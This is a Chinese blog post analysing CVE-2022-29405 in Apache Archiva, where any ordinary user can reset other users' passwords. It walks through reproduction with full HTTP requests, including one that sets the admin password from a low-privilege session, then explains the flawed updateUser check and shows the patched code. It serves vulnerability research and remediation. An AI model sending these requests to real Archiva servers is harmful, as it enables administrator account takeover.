CVE-2022-29405 Apache Archiva任意用户密码重置漏洞分析

最新推荐文章于 2024-07-25 19:06:24 发布
最新推荐文章于 2024-07-25 19:06:24 发布
阅读量1k 收藏 12
点赞数 25
分类专栏: java代码审计 文章标签: apache web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shelter1234567/article/details/137235659
版权

Apache Archiva是一套可扩展的Artifact Repository管理系统。它能够与Maven,Continuum和ANT等构建工具完美结合。Archiva提供的功能包括:远程Repository代理,基于角色的安全访问管理,Artifact分发、维护、查询,生成使用报告,提供基于Web的管理界面等。

Apache Archiva 管理员创建的普通用户,其权限设置不当,导致普通用户可以修改任意用户信息。

影响版本

Apache Archiva 全版本(<=2.2.7)

项目地址GitHub - apache/archiva: Apache Archiva Repository

漏洞复现

1,创建管理员账号 admin:admin123

2,创建普通账号 user:user123 (勾选 validated)

3,将编辑admin账号密码的包抓取下来

POST /restServices/redbackServices/userService/updateUser HTTP/1.1
Host: 10.66.64.106:8080
Content-Length: 752
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: [替换值]
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
Content-Type: application/json
Origin: http://10.66.64.106:8080
Referer: http://10.66.64.106:8080/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [替换值]
Connection: close
​
{"username":"admin","password":"admin123","confirmPassword":"admin123","fullName":"the administrator","email":"admin@admin.com","permanent":true,"validated":true,"timestampAccountCreation":"Mon, 1 Apr 2024 05:36:44 +0000 - 5 minutes ago","timestampLastLogin":null,"timestampLastPasswordChange":"Mon, 1 Apr 2024 05:36:44 +0000 - 5 minutes ago","locked":false,"passwordChangeRequired":false,"assignedRoles":["Global Repository Manager","Global Repository Observer","Repository Manager - internal","Repository Manager - snapshots","Repository Observer - internal","Repository Observer - snapshots","System Administrator","User Administrator"],"modified":true,"readOnly":false,"userManagerId":"jdo","rememberme":false,"validationToken":null,"logged":false}

4,登录普通账号 替换值后发送上面抓取的包

 

POST /restServices/redbackServices/userService/updateUser HTTP/1.1
Host: 10.66.64.106:8080
Content-Length: 750
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: I1ngx29RJKOGWU+mBxHVfK39m8LWeZpH3GGPmN/AVxHaaAa7+TUveJDvO48Z+KgQdclv7P8Zga9ZowMgEW0Q+Pm9q7kq2s0f7M0dUjrvNaislYP18IDjg18zey0jTvGlQlISdTOikY23gVn5+C5AZcJp5mxN3LsB6OWWpFweD4pBgJwUc1ij38n4w5nOUA0l4k8/Q3YoGDRvKL3mK5QTQVpCDt89dxXI0xpH+VYhLkdOTvJlE1WMXV8XN1Hev/Ipvr6XBlhl2tKRvnnWTD8GgxULnBdFdo6EQ4JBYYoWih8YCbSC6vIQCmyGQhkzulIDnCmqsiLH4s4c9Y6Uqeohnw==
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
Content-Type: application/json
Origin: http://10.66.64.106:8080
Referer: http://10.66.64.106:8080/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=n2pfvjl209zinxflbferxloq; archiva_login=%7B%22username%22%3A%22user%22%2C%22password%22%3Anull%2C%22confirmPassword%22%3Anull%2C%22fullName%22%3A%22user123%22%2C%22email%22%3A%22user123%40user123.com%22%2C%22permanent%22%3Afalse%2C%22validated%22%3Atrue%2C%22timestampAccountCreation%22%3Anull%2C%22timestampLastLogin%22%3Anull%2C%22timestampLastPasswordChange%22%3Anull%2C%22locked%22%3Afalse%2C%22passwordChangeRequired%22%3Afalse%2C%22assignedRoles%22%3A%5B%5D%2C%22modified%22%3Afalse%2C%22readOnly%22%3Afalse%2C%22userManagerId%22%3Anull%2C%22rememberme%22%3Afalse%2C%22validationToken%22%3A%22I1ngx29RJKOGWU%2BmBxHVfK39m8LWeZpH3GGPmN%2FAVxHaaAa7%2BTUveJDvO48Z%2BKgQdclv7P8Zga9ZowMgEW0Q%2BPm9q7kq2s0f7M0dUjrvNaislYP18IDjg18zey0jTvGlQlISdTOikY23gVn5%2BC5AZcJp5mxN3LsB6OWWpFweD4pBgJwUc1ij38n4w5nOUA0l4k8%2FQ3YoGDRvKL3mK5QTQVpCDt89dxXI0xpH%2BVYhLkdOTvJlE1WMXV8XN1Hev%2FIpvr6XBlhl2tKRvnnWTD8GgxULnBdFdo6EQ4JBYYoWih8YCbSC6vIQCmyGQhkzulIDnCmqsiLH4s4c9Y6Uqeohnw%3D%3D%22%2C%22logged%22%3Afalse%7D
Connection: close
​
{"username":"admin","password":"user456","confirmPassword":"user456","fullName":"the administrator","email":"admin@admin.com","permanent":true,"validated":true,"timestampAccountCreation":"Mon, 1 Apr 2024 05:36:44 +0000 - 5 minutes ago","timestampLastLogin":null,"timestampLastPasswordChange":"Mon, 1 Apr 2024 05:36:44 +0000 - 5 minutes ago","locked":false,"passwordChangeRequired":false,"assignedRoles":["Global Repository Manager","Global Repository Observer","Repository Manager - internal","Repository Manager - snapshots","Repository Observer - internal","Repository Observer - snapshots","System Administrator","User Administrator"],"modified":true,"readOnly":false,"userManagerId":"jdo","rememberme":false,"validationToken":null,"logged":false}

5, 使用修改后的密码 登录管理员账号

现在查看 管理员账号admin 的密码是否被我们修改为了user456

漏洞验证成功

漏洞分析

userService 中的updateUser 方法

 

该方法 ,必须要有"user-management-user-edit"权限才能访问,然而我们普通也会有这个权限

跟过去这个实现方法updateUser

可以看到所有的参数均由前端传入, 可以造成越权.............

后续修复

 


public Boolean updateUser(User user) throws RedbackServiceException {
    RedbackRequestInformation redbackRequestInformation = RedbackAuthenticationThreadLocal.get();
    if (redbackRequestInformation != null && redbackRequestInformation.getUser() != null) {
        if (user == null) {
            throw new RedbackServiceException(new ErrorMessage("user parameter is mandatory"), Status.BAD_REQUEST.getStatusCode());
        } else if (!StringUtils.equals(redbackRequestInformation.getUser().getUsername(), user.getUsername()) && !StringUtils.equals(redbackRequestInformation.getUser().getUsername(), "admin")) {
            throw new RedbackServiceException(new ErrorMessage("you can update only your profile"), Status.FORBIDDEN.getStatusCode());
        } else {
            try {
                org.apache.archiva.redback.users.User rawUser = this.userManager.findUser(user.getUsername(), false);
                rawUser.setFullName(user.getFullName());
                rawUser.setEmail(user.getEmail());
                rawUser.setValidated(user.isValidated());
                rawUser.setLocked(user.isLocked());
                rawUser.setPassword(user.getPassword());
                rawUser.setPasswordChangeRequired(user.isPasswordChangeRequired());
                rawUser.setPermanent(user.isPermanent());
                this.userManager.updateUser(rawUser);
                return Boolean.TRUE;
            } catch (UserNotFoundException var4) {
                throw new RedbackServiceException(var4.getMessage());
            } catch (UserManagerException var5) {
                throw new RedbackServiceException(new ErrorMessage(var5.getMessage()));
            }
        }
    } else {
        this.log.warn("RedbackRequestInformation from ThreadLocal is null");
        throw new RedbackServiceException(new ErrorMessage("you must be logged to update your profile"), Status.FORBIDDEN.getStatusCode());
    }
}

可以看到前端传入的Username做了再次的校验对比了redbackRequestInformation的username值

昵称还在想呢
关注
  • 25
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
CVE-2022-0543(Redis 沙盒逃逸漏洞
Battery的博客
11-23 9万+
CVE-2022-0543是一个与Redis相关的安全漏洞。在Redis中,用户连接后可以通过eval命令执行Lua脚本,但在沙箱环境中脚本无法执行命令或读取文件。然而,攻击者可以利用Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库liblua5.1.so.0里的导出函数luaopen_io,从而获得io库并执行命令。为了利用这个漏洞,攻击者需要在Redis客户端中输入恶意payload,其中whoami是要执行的命令,也可以根据需求更换其他命令。
开源漏洞深度分析|CVE-2022-29405 Apache Archiva任意用户密码
LJQClqjc的博客
08-16 566
Archiva提供的功能包括:远程Repository代理,基于角色的安全访问管理,Artifact分发、维护、查询,生成使用报告,提供基于Web的管理界面等。在Apache Archiva中存在如下接口,其权限是user-management-user-edit。Apache Archiva 管理员创建的普通用户,其权限设不当,导致普通用户可以修改任意用户信息。注册普通用户test ,登录之后根据请求包,发现具有如下权限。2、登录普通用户,并使用普通用户发送如下数据包。1、使用管理员创建普通用户。...
Apache HTTP Server 拒绝服务漏洞CVE-2022-29404)
murphysec的博客
06-08 2023
CVE-2022-29404漏洞是由于Apache HTTP Server 2.4.53 及更早版本中,对可能的输入大小没有默认限制,攻击者可以利用该漏洞造成拒绝服务。该漏洞影响范围广,漏洞等级低。该问题已在新版本中修复,建议用户更新到最新版本。参考链接:https://seclists.org/oss-sec/2022/q2/183 https://httpd.apache.org/security/vulnerabilities_24.html    【使用墨菲安全的开源工具帮您快速检测代码安全】 墨菲
WSO2文件上传漏洞CVE-2022-29464)
热门推荐
chaojixiaojingang
05-09 1万+
1.漏洞描述 WSO2文件上传漏洞CVE-2022-29464)是Orange Tsai发现的WSO2上的严漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。 2.影响范围 WSO2 API Manager 2.2.0 及更高版本到 4.0.0 WSO2 Identity Server 5.2.0 及以上至 5.11.0 WSO2 身份服务器分析 5.4.0、5.4.1、5.5.0 和 5.6.0 W...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1<Apache spark 版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个要的安全漏洞CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
Apache Spark 命令注入(CVE-2022-33891)格式化文档
08-10
然而,它存在一个名为 CVE-2022-33891 的严安全漏洞,这是一个命令注入问题,允许攻击者通过精心构造的请求在运行受影响版本的 Spark 实例上执行任意系统命令。 此漏洞源于 Spark Web UI 的一个缺陷,特别是与其 ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
文件解析的终极工具:Apache Tika
我码玄黄的博客
07-22 848
ApacheTika是开源的跨平台库,用于检测、提取和解析多种文件格式元数据,支持文档、图片、音频和视频等。广泛应用于搜索引擎、内容管理系统、数据分析等,可提取文档内容用于文本分析、情感分析等。
从0到1:理发店预约剪发小程序开发笔记(上)
CC同学呀
07-25 198
理发师可以在小程序上设自己的可预约时间,价格,自我介绍,顾客可以根据理发师的日程安排选择合适的时间进行预约和支付。这样可以提高预约的效率,减少沟通成本,方便双方的安排。
Apache虚拟主机VirtualHost配项详解
jkzyx123的博客
07-21 390
Apache虚拟主机VirtualHost配项详解
Apache Flink 1.12.1入门教程
07-25 714
在创建表之前,首先我们理解一下Watermark概念,Watermark理解为一个水位线,这个Watermark在不断的变化,Watermark实际上作为数据流的一部分随数据流流动。例如[00:00, 00:15]窗口,返回00:14:59.999。然后直接运行SocketWindowWordCount的 main 方法,只需要在 netcat 控制台输入单词,就能在 SocketWindowWordCount的输出控制台看到每个单词的词频统计,如果在5秒内反复键入相同的单词,就可以看到大于1的计数。
基于 Apache 的 httpd 文件服务器
Python、Golang、大数据
07-21 643
httpd(HTTP Daemon,超文本传输协议守护进程的简称),运行于网页服务器后台,等待传入服务器请求的软件。httpd能够自动回应服务器的请求,并使用http协议传送超文本及多媒体内容。常见的httpdCERN HTTPdCherokeeHiawathaLighttpdNCSA HTTPdNginxOpenBSD这里我们使用应用最广泛的搭建httpd文件服务器。
Apache POI-Excel入门与实战
Alphamilk的博客
07-22 615
Apache POI是一个流行的Java库,用于读写Microsoft Office格式的文件,如Excel、Word和PowerPoint,无需依赖Office软件。
apache.commons.pool2 使用指南
AKA石头
07-24 312
apache.commons.pool2 使用指南
SkyWalking入门搭建【apache-skywalking-apm-10.0.0】
小道仙的后宫
07-21 715
SkyWalking在Java中使用的是字节方式植入,是完全无代码侵入的VM options 添加,就是刚刚上面下的 java-agentEnvironment variables 添加,指定 SkyWalking的地址效果图操作步骤(idea 2023,其它版本百度操作)配好后,启动服务会看到下面的日志,就说明 java-agent.jar 读取到了随机访问几下服务的接口,再去刷新SkyWalking 控制台,就可以看到了。
Apache DolphinScheduler Worker Task执行原理解析
最新发布
Apache DolphinScheduler开源社区
07-25 517
Apache DolphinScheduler是一个分布式、易扩展的可视化工作流调度开源系统,适用于企业级场景。它提供了以下主要功能,通过可视化操作,提供了工作流和任务全生命周期的数据处理解决方案。白鲸开源是一家开源原生的 DataOPS 商业公司,由多个Apache基金会成员创立。公司主要参与贡献了两个Apache开源项目,一个是Apache DolphinScheduler,另一个是Apache SeaTunnel。基于这两个项目,我们打造了一个商业产品——WhaleStudio。
Apache DolphinScheduler 3.2.2 版本正式发布!
Apache DolphinScheduler开源社区
07-23 1137
Improvement-16125][dolphinscheduler-dist] 减少二进制分发 tarball 文件的大小 ([Improvement-15603][API] 删除、修改工作流时,系统可以检查是否有任何任务依赖于它。[Improvement-15919][datasource] Improvement数据源获取名称 ([Bug][dolphinscheduler-task-seatunnel] 脚本资源文件路径错误 (
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

昵称还在想呢

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值